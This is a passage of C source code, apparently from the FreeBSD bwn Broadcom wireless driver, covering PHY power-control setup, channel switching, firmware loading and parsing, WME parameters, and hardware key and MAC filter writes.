i++) { tmp = (i & 0xfffc); tmp |= (i & 0x0001) << 1; tmp |= (i & 0x0002) >> 1; bwn_ofdmtab_write_2(mac, table, i, tmp); } for (i = start; i < end; i++) bwn_ofdmtab_write_2(mac, table, i, i - start); BWN_PHY_SETMASK(mac, 0x04a0, 0xbfbf, 0x4040); BWN_PHY_SETMASK(mac, 0x04a1, 0xbfbf, 0x4040); BWN_PHY_SETMASK(mac, 0x04a2, 0xbfbf, 0x4000); bwn_dummy_transmission(mac, 0, 1); } static void bwn_phy_hwpctl_init(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_rfatt old_rfatt, rfatt; struct bwn_bbatt old_bbatt, bbatt; struct bwn_softc *sc = mac->mac_sc; uint8_t old_txctl = 0; KASSERT(phy->type == BWN_PHYTYPE_G, ("%s:%d: fail", __func__, __LINE__)); if ((siba_get_pci_subvendor(sc->sc_dev) == SIBA_BOARDVENDOR_BCM) && (siba_get_pci_subdevice(sc->sc_dev) == SIBA_BOARD_BU4306)) return; BWN_PHY_WRITE(mac, 0x0028, 0x8018); BWN_WRITE_2(mac, BWN_PHY0, BWN_READ_2(mac, BWN_PHY0) & 0xffdf); if (!phy->gmode) return; bwn_hwpctl_early_init(mac); if (pg->pg_curtssi == 0) { if (phy->rf_ver == 0x2050 && phy->analog == 0) { BWN_RF_SETMASK(mac, 0x0076, 0x00f7, 0x0084); } else { memcpy(&old_rfatt, &pg->pg_rfatt, sizeof(old_rfatt)); memcpy(&old_bbatt, &pg->pg_bbatt, sizeof(old_bbatt)); old_txctl = 
pg->pg_txctl; bbatt.att = 11; if (phy->rf_rev == 8) { rfatt.att = 15; rfatt.padmix = 1; } else { rfatt.att = 9; rfatt.padmix = 0; } bwn_phy_g_set_txpwr_sub(mac, &bbatt, &rfatt, 0); } bwn_dummy_transmission(mac, 0, 1); pg->pg_curtssi = BWN_PHY_READ(mac, BWN_PHY_TSSI); if (phy->rf_ver == 0x2050 && phy->analog == 0) BWN_RF_MASK(mac, 0x0076, 0xff7b); else bwn_phy_g_set_txpwr_sub(mac, &old_bbatt, &old_rfatt, old_txctl); } bwn_hwpctl_init_gphy(mac); /* clear TSSI */ bwn_shm_write_2(mac, BWN_SHARED, 0x0058, 0x7f7f); bwn_shm_write_2(mac, BWN_SHARED, 0x005a, 0x7f7f); bwn_shm_write_2(mac, BWN_SHARED, 0x0070, 0x7f7f); bwn_shm_write_2(mac, BWN_SHARED, 0x0072, 0x7f7f); } static void bwn_hwpctl_early_init(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; if (!bwn_has_hwpctl(mac)) { BWN_PHY_WRITE(mac, 0x047a, 0xc111); return; } BWN_PHY_MASK(mac, 0x0036, 0xfeff); BWN_PHY_WRITE(mac, 0x002f, 0x0202); BWN_PHY_SET(mac, 0x047c, 0x0002); BWN_PHY_SET(mac, 0x047a, 0xf000); if (phy->rf_ver == 0x2050 && phy->rf_rev == 8) { BWN_PHY_SETMASK(mac, 0x047a, 0xff0f, 0x0010); BWN_PHY_SET(mac, 0x005d, 0x8000); BWN_PHY_SETMASK(mac, 0x004e, 0xffc0, 0x0010); BWN_PHY_WRITE(mac, 0x002e, 0xc07f); BWN_PHY_SET(mac, 0x0036, 0x0400); } else { BWN_PHY_SET(mac, 0x0036, 0x0200); BWN_PHY_SET(mac, 0x0036, 0x0400); BWN_PHY_MASK(mac, 0x005d, 0x7fff); BWN_PHY_MASK(mac, 0x004f, 0xfffe); BWN_PHY_SETMASK(mac, 0x004e, 0xffc0, 0x0010); BWN_PHY_WRITE(mac, 0x002e, 0xc07f); BWN_PHY_SETMASK(mac, 0x047a, 0xff0f, 0x0010); } } static void bwn_hwpctl_init_gphy(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_txpwr_loctl *lo = &pg->pg_loctl; int i; uint16_t nr_written = 0, tmp, value; uint8_t rf, bb; if (!bwn_has_hwpctl(mac)) { bwn_hf_write(mac, bwn_hf_read(mac) & ~BWN_HF_HW_POWERCTL); return; } BWN_PHY_SETMASK(mac, 0x0036, 0xffc0, (pg->pg_idletssi - pg->pg_curtssi)); BWN_PHY_SETMASK(mac, 0x0478, 0xff00, (pg->pg_idletssi - pg->pg_curtssi)); for (i = 0; i < 32; i++) bwn_ofdmtab_write_2(mac, 0x3c20, i, pg->pg_tssi2dbm[i]); for (i = 32; i < 64; i++) bwn_ofdmtab_write_2(mac, 0x3c00, i - 32, pg->pg_tssi2dbm[i]); for (i = 0; i < 64; i += 2) { value = (uint16_t) pg->pg_tssi2dbm[i]; value |= ((uint16_t) pg->pg_tssi2dbm[i + 1]) << 8; BWN_PHY_WRITE(mac, 0x380 + (i / 2), value); } for (rf = 0; rf < lo->rfatt.len; rf++) { for (bb = 0; bb < lo->bbatt.len; bb++) { if (nr_written >= 0x40) return; tmp = lo->bbatt.array[bb].att; tmp <<= 8; if (phy->rf_rev == 8) tmp |= 0x50; else tmp |= 0x40; tmp |= lo->rfatt.array[rf].att; BWN_PHY_WRITE(mac, 0x3c0 + nr_written, tmp); nr_written++; } } BWN_PHY_MASK(mac, 0x0060, 0xffbf); BWN_PHY_WRITE(mac, 0x0014, 0x0000); KASSERT(phy->rev >= 6, ("%s:%d: fail", __func__, __LINE__)); BWN_PHY_SET(mac, 0x0478, 0x0800); BWN_PHY_MASK(mac, 0x0478, 0xfeff); BWN_PHY_MASK(mac, 0x0801, 0xffbf); bwn_phy_g_dc_lookup_init(mac, 1); bwn_hf_write(mac, bwn_hf_read(mac) | BWN_HF_HW_POWERCTL); } static void bwn_phy_g_switch_chan(struct bwn_mac *mac, int channel, uint8_t spu) { struct bwn_softc *sc = mac->mac_sc; if (spu != 0) bwn_spu_workaround(mac, channel); BWN_WRITE_2(mac, BWN_CHANNEL, bwn_phy_g_chan2freq(channel)); if (channel == 14) { if (siba_sprom_get_ccode(sc->sc_dev) == SIBA_CCODE_JAPAN) bwn_hf_write(mac, bwn_hf_read(mac) & ~BWN_HF_JAPAN_CHAN14_OFF); else bwn_hf_write(mac, bwn_hf_read(mac) | BWN_HF_JAPAN_CHAN14_OFF); BWN_WRITE_2(mac, BWN_CHANNEL_EXT, BWN_READ_2(mac, BWN_CHANNEL_EXT) | (1 << 11)); return; } BWN_WRITE_2(mac, BWN_CHANNEL_EXT, BWN_READ_2(mac, BWN_CHANNEL_EXT) & 0xf7bf); 
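	/*
	 * The 0xf7bf mask above clears bit 11 (the channel-14 extension
	 * flag set in the channel-14 branch) along with bit 6 of
	 * BWN_CHANNEL_EXT when tuning to channels 1-13.
	 */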
} static uint16_t bwn_phy_g_chan2freq(uint8_t channel) { static const uint8_t bwn_phy_g_rf_channels[] = BWN_PHY_G_RF_CHANNELS; KASSERT(channel >= 1 && channel <= 14, ("%s:%d: fail", __func__, __LINE__)); return (bwn_phy_g_rf_channels[channel - 1]); } static void bwn_phy_g_set_txpwr_sub(struct bwn_mac *mac, const struct bwn_bbatt *bbatt, const struct bwn_rfatt *rfatt, uint8_t txctl) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_txpwr_loctl *lo = &pg->pg_loctl; uint16_t bb, rf; uint16_t tx_bias, tx_magn; bb = bbatt->att; rf = rfatt->att; tx_bias = lo->tx_bias; tx_magn = lo->tx_magn; if (tx_bias == 0xff) tx_bias = 0; pg->pg_txctl = txctl; memmove(&pg->pg_rfatt, rfatt, sizeof(*rfatt)); pg->pg_rfatt.padmix = (txctl & BWN_TXCTL_TXMIX) ? 1 : 0; memmove(&pg->pg_bbatt, bbatt, sizeof(*bbatt)); bwn_phy_g_set_bbatt(mac, bb); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_RADIO_ATT, rf); if (phy->rf_ver == 0x2050 && phy->rf_rev == 8) BWN_RF_WRITE(mac, 0x43, (rf & 0x000f) | (txctl & 0x0070)); else { BWN_RF_SETMASK(mac, 0x43, 0xfff0, (rf & 0x000f)); BWN_RF_SETMASK(mac, 0x52, ~0x0070, (txctl & 0x0070)); } if (BWN_HAS_TXMAG(phy)) BWN_RF_WRITE(mac, 0x52, tx_magn | tx_bias); else BWN_RF_SETMASK(mac, 0x52, 0xfff0, (tx_bias & 0x000f)); bwn_lo_g_adjust(mac); } static void bwn_phy_g_set_bbatt(struct bwn_mac *mac, uint16_t bbatt) { struct bwn_phy *phy = &mac->mac_phy; if (phy->analog == 0) { BWN_WRITE_2(mac, BWN_PHY0, (BWN_READ_2(mac, BWN_PHY0) & 0xfff0) | bbatt); return; } if (phy->analog > 1) { BWN_PHY_SETMASK(mac, BWN_PHY_DACCTL, 0xffc3, bbatt << 2); return; } BWN_PHY_SETMASK(mac, BWN_PHY_DACCTL, 0xff87, bbatt << 3); } static uint16_t bwn_rf_2050_rfoverval(struct bwn_mac *mac, uint16_t reg, uint32_t lpd) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; int max_lb_gain; uint16_t extlna; uint16_t i; if (phy->gmode == 0) return (0); if (BWN_HAS_LOOPBACK(phy)) { max_lb_gain = pg->pg_max_lb_gain; max_lb_gain += (phy->rf_rev == 8) ? 
0x3e : 0x26; if (max_lb_gain >= 0x46) { extlna = 0x3000; max_lb_gain -= 0x46; } else if (max_lb_gain >= 0x3a) { extlna = 0x1000; max_lb_gain -= 0x3a; } else if (max_lb_gain >= 0x2e) { extlna = 0x2000; max_lb_gain -= 0x2e; } else { extlna = 0; max_lb_gain -= 0x10; } for (i = 0; i < 16; i++) { max_lb_gain -= (i * 6); if (max_lb_gain < 6) break; } if ((phy->rev < 7) || !(siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_EXTLNA)) { if (reg == BWN_PHY_RFOVER) { return (0x1b3); } else if (reg == BWN_PHY_RFOVERVAL) { extlna |= (i << 8); switch (lpd) { case BWN_LPD(0, 1, 1): return (0x0f92); case BWN_LPD(0, 0, 1): case BWN_LPD(1, 0, 1): return (0x0092 | extlna); case BWN_LPD(1, 0, 0): return (0x0093 | extlna); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } else { if (reg == BWN_PHY_RFOVER) return (0x9b3); if (reg == BWN_PHY_RFOVERVAL) { if (extlna) extlna |= 0x8000; extlna |= (i << 8); switch (lpd) { case BWN_LPD(0, 1, 1): return (0x8f92); case BWN_LPD(0, 0, 1): return (0x8092 | extlna); case BWN_LPD(1, 0, 1): return (0x2092 | extlna); case BWN_LPD(1, 0, 0): return (0x2093 | extlna); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } return (0); } if ((phy->rev < 7) || !(siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_EXTLNA)) { if (reg == BWN_PHY_RFOVER) { return (0x1b3); } else if (reg == BWN_PHY_RFOVERVAL) { switch (lpd) { case BWN_LPD(0, 1, 1): return (0x0fb2); case BWN_LPD(0, 0, 1): return (0x00b2); case BWN_LPD(1, 0, 1): return (0x30b2); case BWN_LPD(1, 0, 0): return (0x30b3); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } else { if (reg == BWN_PHY_RFOVER) { return (0x9b3); } else if (reg == BWN_PHY_RFOVERVAL) { switch (lpd) { case BWN_LPD(0, 1, 1): return (0x8fb2); case BWN_LPD(0, 0, 1): return (0x80b2); case BWN_LPD(1, 0, 1): return (0x20b2); case BWN_LPD(1, 0, 0): return (0x20b3); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } return (0); } static void bwn_spu_workaround(struct bwn_mac *mac, uint8_t channel) { if (mac->mac_phy.rf_ver != 0x2050 || mac->mac_phy.rf_rev >= 6) return; BWN_WRITE_2(mac, BWN_CHANNEL, (channel <= 10) ? 
bwn_phy_g_chan2freq(channel + 4) : bwn_phy_g_chan2freq(1)); DELAY(1000); BWN_WRITE_2(mac, BWN_CHANNEL, bwn_phy_g_chan2freq(channel)); } static int bwn_fw_gets(struct bwn_mac *mac, enum bwn_fwtype type) { struct bwn_softc *sc = mac->mac_sc; struct bwn_fw *fw = &mac->mac_fw; const uint8_t rev = siba_get_revid(sc->sc_dev); const char *filename; uint32_t high; int error; /* microcode */ if (rev >= 5 && rev <= 10) filename = "ucode5"; else if (rev >= 11 && rev <= 12) filename = "ucode11"; else if (rev == 13) filename = "ucode13"; else if (rev == 14) filename = "ucode14"; else if (rev >= 15) filename = "ucode15"; else { device_printf(sc->sc_dev, "no ucode for rev %d\n", rev); bwn_release_firmware(mac); return (EOPNOTSUPP); } error = bwn_fw_get(mac, type, filename, &fw->ucode); if (error) { bwn_release_firmware(mac); return (error); } /* PCM */ KASSERT(fw->no_pcmfile == 0, ("%s:%d fail", __func__, __LINE__)); if (rev >= 5 && rev <= 10) { error = bwn_fw_get(mac, type, "pcm5", &fw->pcm); if (error == ENOENT) fw->no_pcmfile = 1; else if (error) { bwn_release_firmware(mac); return (error); } } else if (rev < 11) { device_printf(sc->sc_dev, "no PCM for rev %d\n", rev); return (EOPNOTSUPP); } /* initvals */ high = siba_read_4(sc->sc_dev, SIBA_TGSHIGH); switch (mac->mac_phy.type) { case BWN_PHYTYPE_A: if (rev < 5 || rev > 10) goto fail1; if (high & BWN_TGSHIGH_HAVE_2GHZ) filename = "a0g1initvals5"; else filename = "a0g0initvals5"; break; case BWN_PHYTYPE_G: if (rev >= 5 && rev <= 10) filename = "b0g0initvals5"; else if (rev >= 13) filename = "b0g0initvals13"; else goto fail1; break; case BWN_PHYTYPE_LP: if (rev == 13) filename = "lp0initvals13"; else if (rev == 14) filename = "lp0initvals14"; else if (rev >= 15) filename = "lp0initvals15"; else goto fail1; break; case BWN_PHYTYPE_N: if (rev >= 11 && rev <= 12) filename = "n0initvals11"; else goto fail1; break; default: goto fail1; } error = bwn_fw_get(mac, type, filename, &fw->initvals); if (error) { bwn_release_firmware(mac); return (error); } /* bandswitch initvals */ switch (mac->mac_phy.type) { case BWN_PHYTYPE_A: if (rev >= 5 && rev <= 10) { if (high & BWN_TGSHIGH_HAVE_2GHZ) filename = "a0g1bsinitvals5"; else filename = "a0g0bsinitvals5"; } else if (rev >= 11) filename = NULL; else goto fail1; break; case BWN_PHYTYPE_G: if (rev >= 5 && rev <= 10) filename = "b0g0bsinitvals5"; else if (rev >= 11) filename = NULL; else goto fail1; break; case BWN_PHYTYPE_LP: if (rev == 13) filename = "lp0bsinitvals13"; else if (rev == 14) filename = "lp0bsinitvals14"; else if (rev >= 15) filename = "lp0bsinitvals15"; else goto fail1; break; case BWN_PHYTYPE_N: if (rev >= 11 && rev <= 12) filename = "n0bsinitvals11"; else goto fail1; break; default: goto fail1; } error = bwn_fw_get(mac, type, filename, &fw->initvals_band); if (error) { bwn_release_firmware(mac); return (error); } return (0); fail1: device_printf(sc->sc_dev, "no INITVALS for rev %d\n", rev); bwn_release_firmware(mac); return (EOPNOTSUPP); } static int bwn_fw_get(struct bwn_mac *mac, enum bwn_fwtype type, const char *name, struct bwn_fwfile *bfw) { const struct bwn_fwhdr *hdr; struct bwn_softc *sc = mac->mac_sc; const struct firmware *fw; char namebuf[64]; if (name == NULL) { bwn_do_release_fw(bfw); return (0); } if (bfw->filename != NULL) { if (bfw->type == type && (strcmp(bfw->filename, name) == 0)) return (0); bwn_do_release_fw(bfw); } snprintf(namebuf, sizeof(namebuf), "bwn%s_v4_%s%s", (type == BWN_FWTYPE_OPENSOURCE) ? "-open" : "", (mac->mac_phy.type == BWN_PHYTYPE_LP) ? 
"lp_" : "", name); /* XXX Sleeping on "fwload" with the non-sleepable locks held */ fw = firmware_get(namebuf); if (fw == NULL) { device_printf(sc->sc_dev, "the fw file(%s) not found\n", namebuf); return (ENOENT); } if (fw->datasize < sizeof(struct bwn_fwhdr)) goto fail; hdr = (const struct bwn_fwhdr *)(fw->data); switch (hdr->type) { case BWN_FWTYPE_UCODE: case BWN_FWTYPE_PCM: if (be32toh(hdr->size) != (fw->datasize - sizeof(struct bwn_fwhdr))) goto fail; /* FALLTHROUGH */ case BWN_FWTYPE_IV: if (hdr->ver != 1) goto fail; break; default: goto fail; } bfw->filename = name; bfw->fw = fw; bfw->type = type; return (0); fail: device_printf(sc->sc_dev, "the fw file(%s) format error\n", namebuf); if (fw != NULL) firmware_put(fw, FIRMWARE_UNLOAD); return (EPROTO); } static void bwn_release_firmware(struct bwn_mac *mac) { bwn_do_release_fw(&mac->mac_fw.ucode); bwn_do_release_fw(&mac->mac_fw.pcm); bwn_do_release_fw(&mac->mac_fw.initvals); bwn_do_release_fw(&mac->mac_fw.initvals_band); } static void bwn_do_release_fw(struct bwn_fwfile *bfw) { if (bfw->fw != NULL) firmware_put(bfw->fw, FIRMWARE_UNLOAD); bfw->fw = NULL; bfw->filename = NULL; } static int bwn_fw_loaducode(struct bwn_mac *mac) { #define GETFWOFFSET(fwp, offset) \ ((const uint32_t *)((const char *)fwp.fw->data + offset)) #define GETFWSIZE(fwp, offset) \ ((fwp.fw->datasize - offset) / sizeof(uint32_t)) struct bwn_softc *sc = mac->mac_sc; const uint32_t *data; unsigned int i; uint32_t ctl; uint16_t date, fwcaps, time; int error = 0; ctl = BWN_READ_4(mac, BWN_MACCTL); ctl |= BWN_MACCTL_MCODE_JMP0; KASSERT(!(ctl & BWN_MACCTL_MCODE_RUN), ("%s:%d: fail", __func__, __LINE__)); BWN_WRITE_4(mac, BWN_MACCTL, ctl); for (i = 0; i < 64; i++) bwn_shm_write_2(mac, BWN_SCRATCH, i, 0); for (i = 0; i < 4096; i += 2) bwn_shm_write_2(mac, BWN_SHARED, i, 0); data = GETFWOFFSET(mac->mac_fw.ucode, sizeof(struct bwn_fwhdr)); bwn_shm_ctlword(mac, BWN_UCODE | BWN_SHARED_AUTOINC, 0x0000); for (i = 0; i < GETFWSIZE(mac->mac_fw.ucode, sizeof(struct bwn_fwhdr)); i++) { BWN_WRITE_4(mac, BWN_SHM_DATA, be32toh(data[i])); DELAY(10); } if (mac->mac_fw.pcm.fw) { data = GETFWOFFSET(mac->mac_fw.pcm, sizeof(struct bwn_fwhdr)); bwn_shm_ctlword(mac, BWN_HW, 0x01ea); BWN_WRITE_4(mac, BWN_SHM_DATA, 0x00004000); bwn_shm_ctlword(mac, BWN_HW, 0x01eb); for (i = 0; i < GETFWSIZE(mac->mac_fw.pcm, sizeof(struct bwn_fwhdr)); i++) { BWN_WRITE_4(mac, BWN_SHM_DATA, be32toh(data[i])); DELAY(10); } } BWN_WRITE_4(mac, BWN_INTR_REASON, BWN_INTR_ALL); BWN_WRITE_4(mac, BWN_MACCTL, (BWN_READ_4(mac, BWN_MACCTL) & ~BWN_MACCTL_MCODE_JMP0) | BWN_MACCTL_MCODE_RUN); for (i = 0; i < 21; i++) { if (BWN_READ_4(mac, BWN_INTR_REASON) == BWN_INTR_MAC_SUSPENDED) break; if (i >= 20) { device_printf(sc->sc_dev, "ucode timeout\n"); error = ENXIO; goto error; } DELAY(50000); } BWN_READ_4(mac, BWN_INTR_REASON); mac->mac_fw.rev = bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_UCODE_REV); if (mac->mac_fw.rev <= 0x128) { device_printf(sc->sc_dev, "the firmware is too old\n"); error = EOPNOTSUPP; goto error; } mac->mac_fw.patch = bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_UCODE_PATCH); date = bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_UCODE_DATE); mac->mac_fw.opensource = (date == 0xffff); if (bwn_wme != 0) mac->mac_flags |= BWN_MAC_FLAG_WME; mac->mac_flags |= BWN_MAC_FLAG_HWCRYPTO; time = bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_UCODE_TIME); if (mac->mac_fw.opensource == 0) { device_printf(sc->sc_dev, "firmware version (rev %u patch %u date %#x time %#x)\n", mac->mac_fw.rev, mac->mac_fw.patch, date, time); if 
(mac->mac_fw.no_pcmfile) device_printf(sc->sc_dev, "no HW crypto acceleration due to pcm5\n"); } else { mac->mac_fw.patch = time; fwcaps = bwn_fwcaps_read(mac); if (!(fwcaps & BWN_FWCAPS_HWCRYPTO) || mac->mac_fw.no_pcmfile) { device_printf(sc->sc_dev, "disabling HW crypto acceleration\n"); mac->mac_flags &= ~BWN_MAC_FLAG_HWCRYPTO; } if (!(fwcaps & BWN_FWCAPS_WME)) { device_printf(sc->sc_dev, "disabling WME support\n"); mac->mac_flags &= ~BWN_MAC_FLAG_WME; } } if (BWN_ISOLDFMT(mac)) device_printf(sc->sc_dev, "using old firmware image\n"); return (0); error: BWN_WRITE_4(mac, BWN_MACCTL, (BWN_READ_4(mac, BWN_MACCTL) & ~BWN_MACCTL_MCODE_RUN) | BWN_MACCTL_MCODE_JMP0); return (error); #undef GETFWSIZE #undef GETFWOFFSET } /* OpenFirmware only */ static uint16_t bwn_fwcaps_read(struct bwn_mac *mac) { KASSERT(mac->mac_fw.opensource == 1, ("%s:%d: fail", __func__, __LINE__)); return (bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_FWCAPS)); } static int bwn_fwinitvals_write(struct bwn_mac *mac, const struct bwn_fwinitvals *ivals, size_t count, size_t array_size) { #define GET_NEXTIV16(iv) \ ((const struct bwn_fwinitvals *)((const uint8_t *)(iv) + \ sizeof(uint16_t) + sizeof(uint16_t))) #define GET_NEXTIV32(iv) \ ((const struct bwn_fwinitvals *)((const uint8_t *)(iv) + \ sizeof(uint16_t) + sizeof(uint32_t))) struct bwn_softc *sc = mac->mac_sc; const struct bwn_fwinitvals *iv; uint16_t offset; size_t i; uint8_t bit32; KASSERT(sizeof(struct bwn_fwinitvals) == 6, ("%s:%d: fail", __func__, __LINE__)); iv = ivals; for (i = 0; i < count; i++) { if (array_size < sizeof(iv->offset_size)) goto fail; array_size -= sizeof(iv->offset_size); offset = be16toh(iv->offset_size); bit32 = (offset & BWN_FWINITVALS_32BIT) ? 1 : 0; offset &= BWN_FWINITVALS_OFFSET_MASK; if (offset >= 0x1000) goto fail; if (bit32) { if (array_size < sizeof(iv->data.d32)) goto fail; array_size -= sizeof(iv->data.d32); BWN_WRITE_4(mac, offset, be32toh(iv->data.d32)); iv = GET_NEXTIV32(iv); } else { if (array_size < sizeof(iv->data.d16)) goto fail; array_size -= sizeof(iv->data.d16); BWN_WRITE_2(mac, offset, be16toh(iv->data.d16)); iv = GET_NEXTIV16(iv); } } if (array_size != 0) goto fail; return (0); fail: device_printf(sc->sc_dev, "initvals: invalid format\n"); return (EPROTO); #undef GET_NEXTIV16 #undef GET_NEXTIV32 } static int bwn_switch_channel(struct bwn_mac *mac, int chan) { struct bwn_phy *phy = &(mac->mac_phy); struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint16_t channelcookie, savedcookie; int error; if (chan == 0xffff) chan = phy->get_default_chan(mac); channelcookie = chan; if (IEEE80211_IS_CHAN_5GHZ(ic->ic_curchan)) channelcookie |= 0x100; savedcookie = bwn_shm_read_2(mac, BWN_SHARED, BWN_SHARED_CHAN); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_CHAN, channelcookie); error = phy->switch_channel(mac, chan); if (error) goto fail; mac->mac_phy.chan = chan; DELAY(8000); return (0); fail: device_printf(sc->sc_dev, "failed to switch channel\n"); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_CHAN, savedcookie); return (error); } static uint16_t bwn_ant2phy(int antenna) { switch (antenna) { case BWN_ANT0: return (BWN_TX_PHY_ANT0); case BWN_ANT1: return (BWN_TX_PHY_ANT1); case BWN_ANT2: return (BWN_TX_PHY_ANT2); case BWN_ANT3: return (BWN_TX_PHY_ANT3); case BWN_ANTAUTO: return (BWN_TX_PHY_ANT01AUTO); } KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); return (0); } static void bwn_wme_load(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; int i; 
KASSERT(N(bwn_wme_shm_offsets) == N(sc->sc_wmeParams), ("%s:%d: fail", __func__, __LINE__)); bwn_mac_suspend(mac); for (i = 0; i < N(sc->sc_wmeParams); i++) bwn_wme_loadparams(mac, &(sc->sc_wmeParams[i]), bwn_wme_shm_offsets[i]); bwn_mac_enable(mac); } static void bwn_wme_loadparams(struct bwn_mac *mac, const struct wmeParams *p, uint16_t shm_offset) { #define SM(_v, _f) (((_v) << _f##_S) & _f) struct bwn_softc *sc = mac->mac_sc; uint16_t params[BWN_NR_WMEPARAMS]; int slot, tmp; unsigned int i; slot = BWN_READ_2(mac, BWN_RNG) & SM(p->wmep_logcwmin, WME_PARAM_LOGCWMIN); memset(&params, 0, sizeof(params)); DPRINTF(sc, BWN_DEBUG_WME, "wmep_txopLimit %d wmep_logcwmin %d " "wmep_logcwmax %d wmep_aifsn %d\n", p->wmep_txopLimit, p->wmep_logcwmin, p->wmep_logcwmax, p->wmep_aifsn); params[BWN_WMEPARAM_TXOP] = p->wmep_txopLimit * 32; params[BWN_WMEPARAM_CWMIN] = SM(p->wmep_logcwmin, WME_PARAM_LOGCWMIN); params[BWN_WMEPARAM_CWMAX] = SM(p->wmep_logcwmax, WME_PARAM_LOGCWMAX); params[BWN_WMEPARAM_CWCUR] = SM(p->wmep_logcwmin, WME_PARAM_LOGCWMIN); params[BWN_WMEPARAM_AIFS] = p->wmep_aifsn; params[BWN_WMEPARAM_BSLOTS] = slot; params[BWN_WMEPARAM_REGGAP] = slot + p->wmep_aifsn; for (i = 0; i < N(params); i++) { if (i == BWN_WMEPARAM_STATUS) { tmp = bwn_shm_read_2(mac, BWN_SHARED, shm_offset + (i * 2)); tmp |= 0x100; bwn_shm_write_2(mac, BWN_SHARED, shm_offset + (i * 2), tmp); } else { bwn_shm_write_2(mac, BWN_SHARED, shm_offset + (i * 2), params[i]); } } } static void bwn_mac_write_bssid(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; uint32_t tmp; int i; uint8_t mac_bssid[IEEE80211_ADDR_LEN * 2]; bwn_mac_setfilter(mac, BWN_MACFILTER_BSSID, sc->sc_bssid); memcpy(mac_bssid, sc->sc_macaddr, IEEE80211_ADDR_LEN); memcpy(mac_bssid + IEEE80211_ADDR_LEN, sc->sc_bssid, IEEE80211_ADDR_LEN); for (i = 0; i < N(mac_bssid); i += sizeof(uint32_t)) { tmp = (uint32_t) (mac_bssid[i + 0]); tmp |= (uint32_t) (mac_bssid[i + 1]) << 8; tmp |= (uint32_t) (mac_bssid[i + 2]) << 16; tmp |= (uint32_t) (mac_bssid[i + 3]) << 24; bwn_ram_write(mac, 0x20 + i, tmp); } } static void bwn_mac_setfilter(struct bwn_mac *mac, uint16_t offset, const uint8_t *macaddr) { static const uint8_t zero[IEEE80211_ADDR_LEN] = { 0 }; uint16_t data; if (!mac) macaddr = zero; offset |= 0x0020; BWN_WRITE_2(mac, BWN_MACFILTER_CONTROL, offset); data = macaddr[0]; data |= macaddr[1] << 8; BWN_WRITE_2(mac, BWN_MACFILTER_DATA, data); data = macaddr[2]; data |= macaddr[3] << 8; BWN_WRITE_2(mac, BWN_MACFILTER_DATA, data); data = macaddr[4]; data |= macaddr[5] << 8; BWN_WRITE_2(mac, BWN_MACFILTER_DATA, data); } static void bwn_key_dowrite(struct bwn_mac *mac, uint8_t index, uint8_t algorithm, const uint8_t *key, size_t key_len, const uint8_t *mac_addr) { uint8_t buf[BWN_SEC_KEYSIZE] = { 0, }; uint8_t per_sta_keys_start = 8; if (BWN_SEC_NEWAPI(mac)) per_sta_keys_start = 4; KASSERT(index < mac->mac_max_nr_keys, ("%s:%d: fail", __func__, __LINE__)); KASSERT(key_len <= BWN_SEC_KEYSIZE, ("%s:%d: fail", __func__, __LINE__)); if (index >= per_sta_keys_start) bwn_key_macwrite(mac, index, NULL); if (key) memcpy(buf, key, key_len); bwn_key_write(mac, index, algorithm, buf); if (index >= per_sta_keys_start) bwn_key_macwrite(mac, index, mac_addr); mac->mac_key[index].algorithm = algorithm; } static void bwn_key_macwrite(struct bwn_mac *mac, uint8_t index, const uint8_t *addr) { struct bwn_softc *sc = mac->mac_sc; uint32_t addrtmp[2] = { 0, 0 }; uint8_t start = 8; if (BWN_SEC_NEWAPI(mac)) start = 4; KASSERT(index >= start, ("%s:%d: fail", __func__, __LINE__)); index -=
start; if (addr) { addrtmp[0] = addr[0]; addrtmp[0] |= ((uint32_t) (addr[1]) << 8); addrtmp[0] |= ((uint32_t) (addr[2]) << 16); addrtmp[0] |= ((uint32_t) (addr[3]) << 24); addrtmp[1] = addr[4]; addrtmp[1] |= ((uint32_t) (addr[5]) << 8); } if (siba_get_revid(sc->sc_dev) >= 5) { bwn_shm_write_4(mac, BWN_RCMTA, (index * 2) + 0, addrtmp[0]); bwn_shm_write_2(mac, BWN_RCMTA, (index * 2) + 1, addrtmp[1]); } else { if (index >= 8) { bwn_shm_write_4(mac, BWN_SHARED, BWN_SHARED_PSM + (index * 6) + 0, addrtmp[0]); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_PSM + (index * 6) + 4, addrtmp[1]); } } } static void bwn_key_write(struct bwn_mac *mac, uint8_t index, uint8_t algorithm, const uint8_t *key) { unsigned int i; uint32_t offset; uint16_t kidx, value; kidx = BWN_SEC_KEY2FW(mac, index); bwn_shm_write_2(mac, BWN_SHARED, BWN_SHARED_KEYIDX_BLOCK + 